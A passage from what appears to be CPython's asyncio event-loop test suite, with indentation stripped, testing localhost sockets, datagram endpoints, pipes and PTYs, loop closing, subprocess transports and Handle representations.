proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
